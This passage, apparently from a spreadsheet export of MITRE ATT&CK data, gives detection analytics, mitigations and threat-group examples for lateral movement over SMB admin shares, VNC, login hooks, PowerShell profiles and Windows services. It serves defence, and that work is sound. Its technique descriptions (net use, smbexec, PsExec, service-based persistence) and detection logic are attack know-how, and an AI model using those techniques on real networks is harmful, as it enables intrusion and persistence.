Ensure SSH key pairs have strong passwords and refrain from using key-store technologies such as ssh-agent unless they are properly protected.
Privileged Account Management
Do not allow remote access via SSH as root or other privileged accounts.
Restrict File and Directory Permissions
Ensure proper file permissions are set and harden system to prevent root privilege escalation opportunities.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may take control of preexisting sessions with remote services to move laterally in an environment.
Logon Session Creation
Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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Process Creation
Monitor newly executed processes that may take control of preexisting sessions with remote services to move laterally in an environment.
Disable or Remove Feature or Program
Disable the remote service (ex: SSH, RDP, etc.) if it is unnecessary.
Network Segmentation
Enable firewall rules to block unnecessary traffic between network security zones within a network.
Privileged Account Management
Do not allow remote access to services as a privileged account unless necessary.
User Account Management
Limit remote user permissions if remote access is necessary.
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor cloud audit logs and host logs for logon session events. These can be found in CloudTrail, Unified Audit Logs, Windows Event Logs and `/var/log/auth.log` or `/var/log/secure` for Linux systems. 
Disable or Remove Feature or Program
If direct virtual machine connections are not required for administrative use, disable these connection types where feasible.
User Account Management
Limit which users are allowed to access compute infrastructure via cloud native methods.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)
Note: Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on potential connections and writing to remote shares. 
Logon Session Creation
Monitor for logon behavior (ex: EID 4624 Logon Type 3) using [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne)
Network Connection Creation
Monitor for newly constructed network connections (typically over ports 139 or 445), especially those that are sent or received by abnormal or untrusted hosts. Correlate these network connections with remote login events and associated SMB-related activity such as file transfers and remote process execution.
Note: Event ID is for Zeek but can also be implemented in other Network Analysis Frameworks by parsing &amp; decoding captured SMB2 network traffic. Preference would be to detect smb2_write_response event (instead of smb2_write_request), because it would confirm the file was actually written to the remote destination. Unfortunately, Bro/Zeek does not have an event for that SMB message-type yet. From a network traffic capture standpoint, it’s important to capture the right traffic for this type of detection to function (e.g., all endpoint to endpoint if possible or workstation to server and workstation to workstation). As such, it is helpful to have a centralized server area where it is possible to monitor communications between servers and endpoints.
Analytic 1 and 2 are very similar, with the key difference being that Implementation 2 is intended to capture multiple attempts at lateral movement originating from the same host within a short time period (5 minutes).
- Analytic 1 is indication of an SMB file write to a Windows Admin File Share: ADMIN$ or C$
- Analytic 2 is observed originating from the same host, regardless of write-attempts and regardless of whether or not any connection is successful —just connection attempts— within a specified period of time.
From a network traffic capture standpoint, it’s important to capture the right traffic for this type of detection to function (e.g., all endpoint to endpoint if possible or workstation to server and workstation to workstation). As such, it is helpful to have a centralized server area where it is possible to monitor communications between servers and endpoints.The Service Control Manager (SCM) can be used to copy a file to the ADMIN$ share and execute it as a service. This can be detected by looking for incoming RPC network connections to the Service Control Manager, followed by services.exe spawning a child process.
&lt;h4&gt; Analytic 1 - Basic&lt;/h4&gt; 
&lt;code&gt;suspicious_smb_traffic = filter log_events where (
(event_id == "smb2_write_request" OR event_type == "smb1_write_andx_response") AND (connection.smb_state.path == "ADMIN$" OR connection.smb_state.path == "C$"))&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Multiple Attempts (Time Window)&lt;/h4&gt;
&lt;code&gt;suspicious_smb_traffic = filter log_events where ( 
(event_type == "smb2_tree_connect_request" OR event_type == "smb1_tree_connect_andx_request") AND (connection.smb_state.path == "ADMIN$" OR connection.smb_state.path == "C$") REPEATS 5 TIMES WITHIN 5 MINUTES FROM SAME src_ip ) &lt;/code&gt;
Network Share Access
Monitor interactions with network shares, such as reads or file transfers, using Server Message Block (SMB).
Network Traffic Flow
Monitor network data for uncommon SMB data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on SMB network flows.
Notes:
- The logic for Implementation 1 is based around detecting on SMB write requests, which are often used by adversaries to move laterally to another host. Unlike SMB Reads, SMB Write requests typically require an additional level of access, resulting in less activity. Focusing on SMB Write activity narrows the field to looking at techniques associated with actively changing remote hosts, instead of passively reading files.
- The logic for Implementation 2 is based around detection of new processes that were created from a file written to an SMB share.  First, a file is remotely written to a host via an SMB share; then, a variety of Execution techniques can be used to remotely establish execution of the file or script. To detect this behavior, look for files that are written to a host over SMB and then later run directly as a process or in the command line arguments. SMB File Writes and Remote Execution may happen normally in an environment, but the combination of the two behaviors is less frequent and more likely to indicate adversarial activity.
&lt;h4&gt;Analytic 1 - SMB Write&lt;/h4&gt;
&lt;code&gt;smb_write = filter flow where (dest_port == "445" AND protocol == "smb.write")&lt;/code&gt;
&lt;h4&gt;Analytic 2 - SMB Copy and Execution&lt;/h4&gt;
&lt;code&gt;remote_start = join (smb:write, process:create) where (
 smb_write.hostname == process.hostname AND
 smb_write.file_path == process.image_path AND
 (smb_write.time &lt; process.time)) &lt;/code&gt;
&lt;h4&gt;Analytic 3 - RPC Activity&lt;/h4&gt;
&lt;code&gt; rpc_mapper = filter flows where (dest_port == 135)
rpc_endpoint = filter flows where (dest_port &gt;= 49152 and src_port &gt;= 49152)
rpc = join rpc_mapper, rpc_endpoint where (
 (rpc_mapper.time &lt; rpc_endpoint.time &lt; rpc_mapper.time + 2 seconds) and
 (rpc_mapper.src_ip == rpc_endpoint.src_ip and rpc_mapper.dest_ip == rpc_endpoint.dest_ip))&lt;/code&gt;
Process Creation
Monitor for the creation of WMI Win32_Process class and method Create to interact with a remote network share using Server Message Block (SMB). Relevant indicators detected by Bro/Zeek is IWbemServices::ExecMethod or IWbemServices::ExecMethodAsync. One thing to notice is that when the Create method is used on a remote system, the method is run under a host process named “Wmiprvse.exe”.
The process WmiprvSE.exe is what spawns the process defined in the CommandLine parameter of the Create method. Therefore, the new process created remotely will have Wmiprvse.exe as a parent. WmiprvSE.exe is a DCOM server and it is spawned underneath the DCOM service host svchost.exe with the following parameters C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p. From a logon session perspective, on the target, WmiprvSE.exe is spawned in a different logon session by the DCOM service host. However, whatever is executed by WmiprvSE.exe occurs on the new network type (3) logon session created by the user that authenticated from the network.
&lt;h4&gt;Analytic 1 - Basic&lt;/h4&gt; 
&lt;code&gt;suspicious_smb_traffic = filter processes where((event_id = “4688” or event_id = “1”) AND parent_process_name = “wmiprvse.exe” AND targetlogonid = “0x3e7”)&lt;/code&gt;
Filter Network Traffic
Consider using the host firewall to restrict file sharing communications such as SMB. (Citation: Microsoft Preventing SMB)
Limit Access to Resource Over Network
Consider disabling Windows administrative shares.
Password Policies
Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed.
Privileged Account Management
Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) utilized `net use` to connect to network shares.(Citation: Dragos Crashoverride 2018)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Impacket](https://attack.mitre.org/software/S0357)'s smbexec.py as well as accessing the C$ and IPC$ shares to move laterally.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used administrative accounts to connect over SMB to targeted users.(Citation: CrowdStrike StellarParticle January 2022)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has mapped network drives using [Net](https://attack.mitre.org/software/S0039) and administrator credentials.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT3
[APT3](https://attack.mitre.org/groups/G0022) will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement.(Citation: Symantec Buckeye)
APT32
[APT32](https://attack.mitre.org/groups/G0050) used [Net](https://attack.mitre.org/software/S0039) to use Windows' hidden network shares to copy their tools to remote machines for execution.(Citation: Cybereason Cobalt Kitty 2017)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used SMB for lateral movement.(Citation: Symantec Chafer February 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has transferred implant files using Windows Admin Shares.(Citation: Crowdstrike GTR2020 Mar 2020)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Explorer to manually copy malicious files to remote hosts over SMB.(Citation: RedCanary Mockingbird May 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used Windows admin shares to move laterally.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)
Deep Panda
[Deep Panda](https://attack.mitre.org/groups/G0009) uses net.exe to connect to network shares using &lt;code&gt;net use&lt;/code&gt; commands with compromised credentials.(Citation: Alperovitch 2014)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has leveraged SMB to move laterally within a compromised network via application servers and SQL servers.(Citation: Sygnia Elephant Beetle Jan 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has attempted to map to C$ on enumerated hosts to test the scope of their current credentials/context. [FIN8](https://attack.mitre.org/groups/G0061) has also used smbexec from the [Impacket](https://attack.mitre.org/software/S0357) suite for lateral movement.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Bitdefender Sardonic Aug 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used valid accounts to access SMB shares.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) actors have been known to copy files to the network shares of other computers to move laterally.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraAlfa accesses the &lt;code&gt;ADMIN$&lt;/code&gt; share via SMB to conduct lateral movement.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has used batch scripts that can enable SMB on a compromised host.(Citation: Checkpoint MosesStaff Nov 2021)
Orangeworm
[Orangeworm](https://attack.mitre.org/groups/G0071) has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.(Citation: Symantec Orangeworm April 2018)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has copied payloads to the `ADMIN$` share of remote systems and run &lt;code&gt;net use&lt;/code&gt; to connect to network shares.(Citation: Dragos Crashoverride 2018)(Citation: Microsoft Prestige ransomware October 2022)
Threat Group-1314
[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors mapped network drives using &lt;code&gt;net use&lt;/code&gt;.(Citation: Dell TG-1314)
Turla
[Turla](https://attack.mitre.org/groups/G0010) used &lt;code&gt;net use&lt;/code&gt; commands to connect to lateral systems within a network.(Citation: Kaspersky Turla)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk's Return October 2020)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can support windows execution via SMB shares.(Citation: Medium Anchor DNS July 2020)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has run a plug-in on a victim to spread through the local network by using [PsExec](https://attack.mitre.org/software/S0029) and accessing admin shares.(Citation: Securelist BlackEnergy Nov 2014)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) has the ability to use SMB to pivot in compromised networks.(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: Dark Vortex Brute Ratel C4)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Window admin shares (C$ and ADMIN$) for lateral movement.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Trend Micro Black Basta October 2022)
Conficker
[Conficker](https://attack.mitre.org/software/S0608) variants spread through NetBIOS share propagation.(Citation: SANS Conficker)
Conti
[Conti](https://attack.mitre.org/software/S0575) can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) can spread throughout a network via SMB prior to encryption.(Citation: Fortinet Diavol July 2021)
Duqu
Adversaries can instruct [Duqu](https://attack.mitre.org/software/S0038) to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.(Citation: Symantec W32.Duqu)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has leveraged the Admin$, C$, and IPC$ shares for lateral movement. (Citation: Malwarebytes Emotet Dec 2017)(Citation: Binary Defense Emotes Wi-Fi Spreader) 
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems.(Citation: ESET Hermetic Wizard March 2022)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) copies itself over network shares to move laterally on a victim network.(Citation: Symantec Orangeworm April 2018)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can infect victims by brute forcing SMB.(Citation: Unit 42 Lucifer June 2020)
Net
Lateral movement can be done with [Net](https://attack.mitre.org/software/S0039) through &lt;code&gt;net use&lt;/code&gt; commands to connect to the on remote systems.(Citation: Savill 1999)
Net Crawler
[Net Crawler](https://attack.mitre.org/software/S0056) uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.(Citation: Cylance Cleaver)
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) can use [PsExec](https://attack.mitre.org/software/S0029), which interacts with the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: PsExec Russinovich)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [PsExec](https://attack.mitre.org/software/S0029) to interact with the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: Talos Olympic Destroyer 2018)(Citation: PsExec Russinovich)
PsExec
[PsExec](https://attack.mitre.org/software/S0029), a tool that has been used by adversaries, writes programs to the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: PsExec Russinovich)
Regin
The [Regin](https://attack.mitre.org/software/S0019) malware platform can use Windows admin shares to move laterally.(Citation: Kaspersky Regin)
Royal
[Royal](https://attack.mitre.org/software/S1073) can use SMB to connect to move laterally.(Citation: Cybereason Royal December 2022)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has used the C$ network share for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) to execute the malware.(Citation: FireEye Shamoon Nov 2016)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) propagates to available network shares.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Zox
[Zox](https://attack.mitre.org/software/S0672) has the ability to use SMB for communication.(Citation: Novetta-Axiom)
zwShell
[zwShell](https://attack.mitre.org/software/S0350) has been copied over network shares to move laterally.(Citation: McAfee Night Dragon)
</t>
  </si>
  <si>
    <t xml:space="preserve">Logon Session Creation
Monitor for user accounts logged into systems that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). For example, on macOS systems &lt;code&gt;log show --predicate 'process = "screensharingd" and eventMessage contains "Authentication:"'&lt;/code&gt; can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing) 
Network Connection Creation
Monitor for newly constructed network connections that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC. 
Process Creation
Monitor for newly executed processes that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). For example, on macOS systems the &lt;code&gt;screensharingd&lt;/code&gt; process may be related to VNC connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Audit
Inventory workstations for unauthorized VNC server software.
Disable or Remove Feature or Program
Uninstall any VNC server software where not required.
Filter Network Traffic
VNC defaults to TCP ports 5900 for the server, 5800 for browser access, and 5500 for a viewer in listening mode. Filtering or blocking these ports will inhibit VNC traffic utilizing default ports.
Limit Software Installation
Restrict software installation to user groups that require it. A VNC server must be manually installed by the user or adversary.
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used TightVNC to control compromised hosts.(Citation: CrowdStrike Carbon Spider August 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has installed TightVNC server and client on compromised servers and endpoints for lateral movement.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GCMAN
[GCMAN](https://attack.mitre.org/groups/G0036) uses VNC for lateral movement.(Citation: Securelist GCMAN)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) can start a remote VNC session by downloading a new plugin.(Citation: Prevx Carberp March 2011)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) can use VNC for remote access to targeted systems.(Citation: ClearSky Siamesekitten August 2021)
Proton
[Proton](https://attack.mitre.org/software/S0279) uses VNC to connect into systems.(Citation: objsee mac malware 2017)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) has used a VNC module to monitor the victim and collect information to pivot to valuable systems on the network (Citation: Trickbot VNC module July 2021)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) has the ability of performing remote desktop access via a VNC console.(Citation: Check Point Warzone Feb 2020)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) supports functionality for VNC sessions.(Citation: Talos ZxShell Oct 2014) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands with arguments to install or modify login hooks.
File Creation
Monitor for the creation of and/or changes to login hook files (&lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt;), especially by unusual accounts outside of normal administration duties.
File Modification
Monitor for changes to login hook files (&lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt;), especially by unusual accounts outside of normal administration duties.
Process Creation
Monitor for processes and/or command-lines to install or modify login hooks, as well as processes spawned at user login by these hooks.
Restrict File and Directory Permissions
Restrict write access to logon scripts to specific administrators.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by an interrupt signal.
File Creation
Monitor for newly constructed files that may establish persistence by executing malicious content triggered by an interrupt signal.
File Modification
Monitor for changes made to files that may establish persistence by executing malicious content triggered by an interrupt signal.
Process Creation
Monitor newly executed processes that may establish persistence by executing malicious content triggered by an interrupt signal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules.
File Creation
Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
File Modification
Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
Process Creation
Monitor newly executed processes that may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.
Code Signing
Enforce execution of only signed PowerShell scripts. Sign profiles to avoid them from being modified.
Restrict File and Directory Permissions
Making PowerShell profiles immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.
Software Configuration
Avoid PowerShell profiles if not needed. Use the -No Profile flag with when executing PowerShell scripts remotely to prevent local profiles and scripts from being executed.
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used PowerShell profiles to maintain persistence on an infected machine.(Citation: ESET Turla PowerShell May 2019)
</t>
  </si>
  <si>
    <t>Command Execution
Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Also collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.
Driver Load
Monitor for new service driver installations and loads (ex: Sysmon Event ID 6) that are not part of known software update/patch cycles.
Note: Sysmon Event ID 6 (driver load) provides information on whether the loaded driver was signed with a valid signature (via the &lt;code&gt;Signature&lt;/code&gt; and &lt;code&gt;SignatureStatus&lt;/code&gt; fields). As such, one way to help reduce the volume of alerts and false positives associated with this event is to filter and exclude any driver load events signed by common and legitimate publishers like Microsoft. 
File Metadata
Adversaries may modify the binary file for an existing service to achieve [Persistence](https://attack.mitre.org/tactics/TA0003) while potentially [Defense Evasion](https://attack.mitre.org/tactics/TA0005). If a newly created or modified runs as a service, it may indicate APT activity. However, services are frequently installed by legitimate software. A well-tuned baseline is essential to differentiating between benign and malicious service modifications. Look for events where a file was created and then later run as a service. In these cases, a new service has been created or the binary has been modified. Many programs, such as msiexec.exe, do these behaviors legitimately and can be used to help validate legitimate service creations/modifications.
&lt;h4&gt;Analytic 1 - Service Binary Modifications&lt;/h4&gt;
&lt;code&gt;legitimate_installers = ["C:\windows\system32\msiexec.exe", "C:\windows\syswow64\msiexec.exe", ...]
file_change = search File:Create,Modify
process = search Process:Create
service_process = filter processes where (parent_exe == "services.exe")
modified_service = join (search, filter) where (
 file_change.time &lt; service_process.time and
 file_change.file_path == service_process.image_path
)
modified_service = filter modified_service where (modified_service.file_change.image_path not in legitimate_installers)
output modified_service&lt;/code&gt;
Network Traffic Flow
Monitor for several ways that code can execute on a remote host. One of the most common methods is via the Windows Service Control Manager (SCM), which allows authorized users to remotely create and modify services. Several tools, such as [PsExec](https://attack.mitre.org/software/S0029), use this functionality.
When a client remotely communicates with the Service Control Manager, there are two observable behaviors. First, the client connects to the RPC Endpoint Mapper over 135/tcp. This handles authentication, and tells the client what port the endpoint—in this case the SCM—is listening on. Then, the client connects directly to the listening port on services.exe. If the request is to start an existing service with a known command line, the the SCM process will run the corresponding command.
This compound behavior can be detected by looking for services.exe receiving a network connection and immediately spawning a child process.
&lt;h4&gt;Analytic 1 - Remotely Launched Executables via Services&lt;/h4&gt;
&lt;code&gt;service = filter process where (parent_exe == "services.exe")
remote_start = join (flow, service ) where (
 flow.hostname == service.hostname and
 flow.pid == service.pid and
 (flow.time &lt; service.time &lt; flow.time + 1 second))&lt;/code&gt;
OS API Execution
Monitor for API calls that may create or modify Windows services (ex: ` CreateServiceW()`) to repeatedly execute malicious payloads as part of persistence.
Process Creation
Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Windows runs the Service Control Manager (SCM) within the process services.exe. Windows launches services as independent processes or DLL loads within a svchost.exe group. To be a legitimate service, a process (or DLL) must have the appropriate service entry point SvcMain. If an application does not have the entry point, then it will timeout (default is 30 seconds) and the process will be killed.
To survive the timeout, adversaries and red teams can create services that direct to cmd.exe with the flag /c, followed by the desired command. The /c flag causes the command shell to run a command and immediately exit. As a result, the desired program will remain running and it will report an error starting the service. This analytic will catch that command prompt instance that is used to launch the actual malicious executable. Additionally, the children and descendants of services.exe will run as a SYSTEM user by default. 
Note: Create a baseline of services seen over the last 30 days and a list of services seen today. Remove services in the baseline from services seen today, leaving a list of new services. Returns all processes named cmd.exe that have services.exe as a parent process. Because this should never happen, the /c flag is redundant in the search.
&lt;h4&gt; Analytic 1 : Service Outlier Executables &lt;/h4&gt; 
&lt;code&gt; services = filter processes where (parent_image_path == "C:\Windows\System32\services.exe")
historic_services = filter services (where timestamp &lt; now - 1 day AND timestamp &gt; now - 1 day)
current_services = filter services (where timestamp &gt;= now - 1 day)
new_services = historic_services - current_services &lt;/code&gt; 
&lt;h4&gt; Analytic 2 : Services launching CMD &lt;/h4&gt; 
&lt;code&gt; suspicious_processes = filter processes where
  (event_id == "1" OR event_id == "4688") AND
  (exe == "cmd.exe" and parent_exe == "services.exe")&lt;/code&gt;
Service Creation
Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)), especially those associated with unknown/abnormal drivers. New, benign services may be created during installation of new software.
&lt;h4&gt; Analytic 1 : Creation of new services with unusual directory paths such as temporal files in APPDATA &lt;/h4&gt;
&lt;code&gt; suspicious_services = filter ServiceName, ServiceFilePath, ServiceType, ServiceStartType, ServiceAccountName where
  (event_id == "7045" OR event_id == "4697") AND
  (ServiceFilePath LIKE '%APPDATA%' OR ServiceImagePath LIKE '%PUBLIC%')&lt;/code&gt;
Service Modification
Monitor for changes made to Windows services to repeatedly execute malicious payloads as part of persistence.
&lt;h4&gt;Analytic 1 : System services via registry modifications &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter ProcessGuid, ProcessFilePath, RegistryKeyPath, UserName 
where
  event_id == "13" AND
  EventType == "SetValue" AND
  RegistryKeyPath LIKE '%HKLM\System\CurrentControlSet\Services\%' AND
  (RegistryKeyPath LIKE '%ImagePath%' OR 
   RegistryKeyPath LIKE '%Type%' OR
   RegistryKeyPath LIKE '%DisplayName%' OR
   RegistryKeyPath LIKE '%Objectname%')&lt;/code&gt;
Windows Registry Key Creation
Monitor for new constructed windows registry keys that may create or modify Windows services to repeatedly execute malicious payloads as part of persistence.
&lt;h4&gt; Analytic 1 : Creation of the HKLM\System\CurrentControlSet\Services Registry key &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter ProcessGuid, ProcessFilePath, RegistryKeyPath, UserName where
  event_id == "12" AND
  RegistryKeyPath LIKE '%HKLM\System\CurrentControlSet\Services\%' &lt;/code&gt;
Windows Registry Key Modification
Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)
&lt;h4&gt; Analytic 1 : Modification of the HKLM\System\CurrentControlSet\Services Registry key&lt;/h4&gt;
&lt;code&gt; suspicious_registry = filter ProcessGuid, ProcessFilePath, RegistryKeyPath, UserName 
where
  (event_id == "13" event_id == "14") AND
  RegistryKeyPath LIKE '%HKLM\System\CurrentControlSet\Services\%'&lt;/code&gt;
Audit
Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. 
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent an application from writing a signed vulnerable driver to the system.(Citation: Malicious Driver Reporting Center) On Windows 10 and 11, enable Microsoft Vulnerable Driver Blocklist to assist in hardening against third party-developed service drivers.(Citation: Microsoft driver block rules)  
Code Signing
Enforce registration and execution of only legitimately signed service drivers where possible.
Operating System Configuration
Ensure that Driver Signature Enforcement is enabled to restrict unsigned drivers from being installed. 
User Account Management
Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. 
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used an arbitrary system service to load at system boot for persistence for [Industroyer](https://attack.mitre.org/software/S0604). They also replaced the ImagePath registry value of a Windows service with a new backdoor binary. (Citation: Dragos Crashoverride 2017)
Operation CuckooBees
